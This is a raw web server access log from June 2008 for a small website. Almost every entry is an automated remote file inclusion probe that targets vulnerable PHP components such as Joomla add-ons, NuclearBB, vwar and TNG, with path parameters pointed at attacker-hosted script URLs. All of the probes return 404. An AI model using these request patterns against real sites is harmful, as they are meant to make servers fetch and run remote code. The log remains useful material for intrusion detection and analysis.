64.128.80.17 - - [08/Jun/2008:21:25:13 -0700] "GET //path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
64.128.80.17 - - [08/Jun/2008:21:25:13 -0700] "GET /logs//path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
64.128.80.17 - - [08/Jun/2008:21:25:13 -0700] "GET /logs//path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
72.25.5.89 - - [08/Jun/2008:21:25:14 -0700] "GET /logs/access_080414.log//path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
72.25.5.89 - - [08/Jun/2008:21:25:14 -0700] "GET //path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
72.25.5.89 - - [08/Jun/2008:21:25:14 -0700] "GET /logs//path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
160.99.12.231 - - [08/Jun/2008:21:26:12 -0700] "GET /logs/access_080512.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
160.99.12.231 - - [08/Jun/2008:21:26:12 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
160.99.12.231 - - [08/Jun/2008:21:26:13 -0700] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
91.121.87.84 - - [08/Jun/2008:21:26:35 -0700] "GET /logs/access_080512.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
91.121.87.84 - - [08/Jun/2008:21:26:36 -0700] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
202.221.143.111 - - [08/Jun/2008:21:26:59 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
202.221.143.111 - - [08/Jun/2008:21:26:59 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
91.121.87.84 - - [08/Jun/2008:21:27:45 -0700] "GET /logs/access_080414.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
213.194.149.28 - - [08/Jun/2008:21:28:24 -0700] "GET /logs/access_080512.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://powderpuffsquad.com/admin/backups/.de/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
213.194.149.28 - - [08/Jun/2008:21:28:24 -0700] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://powderpuffsquad.com/admin/backups/.de/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
160.99.12.231 - - [08/Jun/2008:21:28:35 -0700] "GET /logs/access_080414.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
84.19.178.202 - - [08/Jun/2008:21:29:45 -0700] "GET /logs/access_080414.log//path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
84.19.178.202 - - [08/Jun/2008:21:29:46 -0700] "GET //path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
84.19.178.202 - - [08/Jun/2008:21:29:46 -0700] "GET /logs//path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
213.194.149.28 - - [08/Jun/2008:21:30:42 -0700] "GET /logs/access_080414.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://powderpuffsquad.com/admin/backups/.de/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
202.221.143.111 - - [08/Jun/2008:21:30:49 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
81.15.36.156 - - [08/Jun/2008:21:32:30 -0700] "GET /logs/plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://83.19.144.26/go.do?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.mathstamps.com"
81.15.36.156 - - [08/Jun/2008:21:32:32 -0700] "GET /plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://83.19.144.26/go.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.mathstamps.com"
84.234.24.217 - - [08/Jun/2008:21:34:08 -0700] "GET /logs/access_080324.log//gbid=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
84.234.24.217 - - [08/Jun/2008:21:34:08 -0700] "GET //gbid=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
84.234.24.217 - - [08/Jun/2008:21:34:09 -0700] "GET /logs//gbid=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
84.234.24.217 - - [08/Jun/2008:21:34:10 -0700] "GET /logs/access_080414.log//gbid=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
221.143.43.214 - - [08/Jun/2008:21:36:31 -0700] "GET /logs/access_080414.log//path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://legacyprinciples.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
221.143.43.214 - - [08/Jun/2008:21:36:32 -0700] "GET //path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://legacyprinciples.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
221.143.43.214 - - [08/Jun/2008:21:36:33 -0700] "GET /logs//path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://legacyprinciples.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
221.143.43.214 - - [08/Jun/2008:21:36:38 -0700] "GET /logs/access_080414.log//path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://legacyprinciples.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
221.143.43.214 - - [08/Jun/2008:21:36:39 -0700] "GET //path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://legacyprinciples.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
221.143.43.214 - - [08/Jun/2008:21:36:41 -0700] "GET /logs//path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://legacyprinciples.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
203.130.242.48 - - [08/Jun/2008:21:40:49 -0700] "GET /logs/access_080519.log/modules/My_eGallery/index.php?basepath=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
203.130.242.48 - - [08/Jun/2008:21:40:49 -0700] "GET /modules/My_eGallery/index.php?basepath=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
203.130.242.48 - - [08/Jun/2008:21:40:50 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
202.221.143.111 - - [08/Jun/2008:21:41:25 -0700] "GET /logs/access_080512.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
202.221.143.111 - - [08/Jun/2008:21:41:26 -0700] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
202.221.143.111 - - [08/Jun/2008:21:43:23 -0700] "GET /logs/access_080414.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
74.200.71.234 - - [08/Jun/2008:21:46:59 -0700] "GET /logs/index.php?option=com_restaurante&task=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.200.71.234 - - [08/Jun/2008:21:46:59 -0700] "GET /index.php?option=com_restaurante&task=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.200.71.234 - - [08/Jun/2008:21:52:50 -0700] "GET /logs/access_080519.log/index.php?option=com_restaurante&task=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.200.71.234 - - [08/Jun/2008:21:52:52 -0700] "GET /logs/access_080421.log/index.php?option=com_restaurante&task=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
62.140.73.234 - - [08/Jun/2008:22:00:26 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://o-x-r-a-n-a.ru/forum/language/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.mathstamps.com"
62.140.73.234 - - [08/Jun/2008:22:00:26 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://o-x-r-a-n-a.ru/forum/language/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.mathstamps.com"
74.6.17.177 - - [08/Jun/2008:22:02:09 -0700] "GET /tmp/?D=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
80.93.59.63 - - [08/Jun/2008:22:02:24 -0700] "GET /logs/access_080421.log/vwar//includes/functions_install.php?vwar_root=http://www.cd-virgin.com/down/rox.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
80.93.59.63 - - [08/Jun/2008:22:02:24 -0700] "GET /vwar//includes/functions_install.php?vwar_root=http://www.cd-virgin.com/down/rox.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
80.93.59.63 - - [08/Jun/2008:22:02:25 -0700] "GET /logs/vwar//includes/functions_install.php?vwar_root=http://www.cd-virgin.com/down/rox.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
203.130.242.48 - - [08/Jun/2008:22:07:56 -0700] "GET /logs/access_080512.log/modules/My_eGallery/index.php?basepath=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.111.11.7 - - [08/Jun/2008:22:10:33 -0700] "GET /logs/access_080414.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.111.11.7 - - [08/Jun/2008:22:10:45 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.128.131.80 - - [08/Jun/2008:22:13:20 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
206.221.179.200 - - [08/Jun/2008:22:15:38 -0700] "GET /logs/access_080512.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
206.221.179.200 - - [08/Jun/2008:22:15:38 -0700] "GET /logs/access_080512.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
206.221.179.200 - - [08/Jun/2008:22:15:38 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
206.221.179.200 - - [08/Jun/2008:22:15:38 -0700] "GET /logs/access_080512.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
206.221.179.200 - - [08/Jun/2008:22:15:38 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
206.221.179.200 - - [08/Jun/2008:22:15:38 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
206.221.179.200 - - [08/Jun/2008:22:15:38 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
206.221.179.200 - - [08/Jun/2008:22:15:38 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
206.221.179.200 - - [08/Jun/2008:22:15:39 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
89.248.97.34 - - [08/Jun/2008:22:17:18 -0700] "GET /logs/access_080505.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
89.248.97.34 - - [08/Jun/2008:22:17:18 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
89.248.97.34 - - [08/Jun/2008:22:17:19 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
72.232.94.122 - - [08/Jun/2008:22:17:52 -0700] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
72.232.94.122 - - [08/Jun/2008:22:17:52 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
72.232.94.122 - - [08/Jun/2008:22:17:52 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
89.248.97.34 - - [08/Jun/2008:22:18:35 -0700] "GET /logs/access_080407.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
206.221.179.200 - - [08/Jun/2008:22:22:08 -0700] "GET /logs/access_080414.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
206.221.179.200 - - [08/Jun/2008:22:22:10 -0700] "GET /logs/access_080414.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
206.221.179.200 - - [08/Jun/2008:22:22:15 -0700] "GET /logs/access_080414.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
72.232.94.122 - - [08/Jun/2008:22:23:42 -0700] "GET /logs/access_080505.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
74.6.17.177 - - [08/Jun/2008:22:24:12 -0700] "GET /logs/access_080512.log HTTP/1.0" 200 5406353 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
216.118.97.178 - - [08/Jun/2008:22:34:41 -0700] "GET /logs/access_080512.log//index.php?option=com_custompages&cpage=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.118.97.178 - - [08/Jun/2008:22:34:41 -0700] "GET //index.php?option=com_custompages&cpage=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.118.97.178 - - [08/Jun/2008:22:34:41 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
62.128.131.80 - - [08/Jun/2008:22:41:44 -0700] "GET /logs/access_080407.log//skin/zero_vote/ask_password.php?dir=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
62.128.131.80 - - [08/Jun/2008:22:41:44 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
62.128.131.80 - - [08/Jun/2008:22:41:45 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
216.118.97.178 - - [08/Jun/2008:22:42:01 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
89.108.64.164 - - [08/Jun/2008:22:42:27 -0700] "GET /vwar//includes/functions_install.php?vwar_root=http://thefantasyclub.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
71.187.41.12 - - [08/Jun/2008:22:45:54 -0700] "GET /logs/showtree.php?tree=Pulfords&&DI=6244&IG=150105148c564b998141cd9e5abdd82d&POS=9&CM=WPU&CE=9&CS=AWP&SR=9&sample=1/historytemplate.php?cms[support]=1&cms[tngpath]=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
71.187.41.12 - - [08/Jun/2008:22:45:54 -0700] "GET /showtree.php?tree=Pulfords&&DI=6244&IG=150105148c564b998141cd9e5abdd82d&POS=9&CM=WPU&CE=9&CS=AWP&SR=9&sample=1/historytemplate.php?cms[support]=1&cms[tngpath]=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.22.37.144 - - [08/Jun/2008:22:46:36 -0700] "GET /logs/showtree.php?tree=Pulfords&&DI=6244&IG=150105148c564b998141cd9e5abdd82d&POS=9&CM=WPU&CE=9&CS=AWP&SR=9&sample=1/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
87.22.37.144 - - [08/Jun/2008:22:46:36 -0700] "GET /showtree.php?tree=Pulfords&&DI=6244&IG=150105148c564b998141cd9e5abdd82d&POS=9&CM=WPU&CE=9&CS=AWP&SR=9&sample=1/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
216.118.97.178 - - [08/Jun/2008:22:47:16 -0700] "GET /logs/showtree.php?tree=Pulfords&&DI=6244&IG=150105148c564b998141cd9e5abdd82d&POS=9&CM=WPU&CE=9&CS=AWP&SR=9&sample=1/historytemplate.php?cms[support]=1&cms[tngpath]=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.118.97.178 - - [08/Jun/2008:22:47:16 -0700] "GET /showtree.php?tree=Pulfords&&DI=6244&IG=150105148c564b998141cd9e5abdd82d&POS=9&CM=WPU&CE=9&CS=AWP&SR=9&sample=1/historytemplate.php?cms[support]=1&cms[tngpath]=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
71.187.41.12 - - [08/Jun/2008:22:47:44 -0700] "GET /showtree.php?tree=Pulfords&&DI=6244&IG=150105148c564b998141cd9e5abdd82d&POS=9&CM=WPU&CE=9&CS=AWP&SR=9&sample=1/historytemplate.php?cms[support]=1&cms[tngpath]=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
71.187.41.12 - - [08/Jun/2008:22:47:54 -0700] "GET /logs/access_080414.log/showtree.php?tree=Pulfords&&DI=6244&IG=150105148c564b998141cd9e5abdd82d&POS=9&CM=WPU&CE=9&CS=AWP&SR=9&sample=1/historytemplate.php?cms[support]=1&cms[tngpath]=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
71.187.41.12 - - [08/Jun/2008:22:47:55 -0700] "GET /showtree.php?tree=Pulfords&&DI=6244&IG=150105148c564b998141cd9e5abdd82d&POS=9&CM=WPU&CE=9&CS=AWP&SR=9&sample=1/historytemplate.php?cms[support]=1&cms[tngpath]=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
71.187.41.12 - - [08/Jun/2008:22:47:55 -0700] "GET /logs/showtree.php?tree=Pulfords&&DI=6244&IG=150105148c564b998141cd9e5abdd82d&POS=9&CM=WPU&CE=9&CS=AWP&SR=9&sample=1/historytemplate.php?cms[support]=1&cms[tngpath]=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
71.187.41.12 - - [08/Jun/2008:22:48:11 -0700] "GET /logs/access_080428.log/showtree.php?tree=Pulfords&&DI=6244&IG=150105148c564b998141cd9e5abdd82d&POS=9&CM=WPU&CE=9&CS=AWP&SR=9&sample=1/historytemplate.php?cms[support]=1&cms[tngpath]=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
216.118.97.178 - - [08/Jun/2008:22:48:14 -0700] "GET /logs/access_080414.log/showtree.php?tree=Pulfords&&DI=6244&IG=150105148c564b998141cd9e5abdd82d&POS=9&CM=WPU&CE=9&CS=AWP&SR=9&sample=1/historytemplate.php?cms[support]=1&cms[tngpath]=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.118.97.178 - - [08/Jun/2008:22:48:14 -0700] "GET /showtree.php?tree=Pulfords&&DI=6244&IG=150105148c564b998141cd9e5abdd82d&POS=9&CM=WPU&CE=9&CS=AWP&SR=9&sample=1/historytemplate.php?cms[support]=1&cms[tngpath]=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.118.97.178 - - [08/Jun/2008:22:48:15 -0700] "GET /logs/showtree.php?tree=Pulfords&&DI=6244&IG=150105148c564b998141cd9e5abdd82d&POS=9&CM=WPU&CE=9&CS=AWP&SR=9&sample=1/historytemplate.php?cms[support]=1&cms[tngpath]=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.118.97.178 - - [08/Jun/2008:22:48:30 -0700] "GET /logs/access_080428.log/showtree.php?tree=Pulfords&&DI=6244&IG=150105148c564b998141cd9e5abdd82d&POS=9&CM=WPU&CE=9&CS=AWP&SR=9&sample=1/historytemplate.php?cms[support]=1&cms[tngpath]=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
89.108.64.164 - - [08/Jun/2008:22:48:53 -0700] "GET /logs/access_080421.log/vwar//includes/functions_install.php?vwar_root=http://thefantasyclub.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.108.64.164 - - [08/Jun/2008:22:48:53 -0700] "GET /logs/vwar//includes/functions_install.php?vwar_root=http://thefantasyclub.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
212.239.21.26 - - [08/Jun/2008:22:50:18 -0700] "GET /logs/showtree.php?tree=Pulfords&&DI=6244&IG=150105148c564b998141cd9e5abdd82d&POS=9&CM=WPU&CE=9&CS=AWP&SR=9&sample=1/historytemplate.php?cms[support]=1&cms[tngpath]=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
212.239.21.26 - - [08/Jun/2008:22:50:18 -0700] "GET /showtree.php?tree=Pulfords&&DI=6244&IG=150105148c564b998141cd9e5abdd82d&POS=9&CM=WPU&CE=9&CS=AWP&SR=9&sample=1/historytemplate.php?cms[support]=1&cms[tngpath]=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
212.239.21.26 - - [08/Jun/2008:22:50:44 -0700] "GET /logs/access_080407.log/showtree.php?tree=Pulfords&&DI=6244&IG=150105148c564b998141cd9e5abdd82d&POS=9&CM=WPU&CE=9&CS=AWP&SR=9&sample=1/historytemplate.php?cms[support]=1&cms[tngpath]=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
212.239.21.26 - - [08/Jun/2008:22:50:45 -0700] "GET /showtree.php?tree=Pulfords&&DI=6244&IG=150105148c564b998141cd9e5abdd82d&POS=9&CM=WPU&CE=9&CS=AWP&SR=9&sample=1/historytemplate.php?cms[support]=1&cms[tngpath]=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
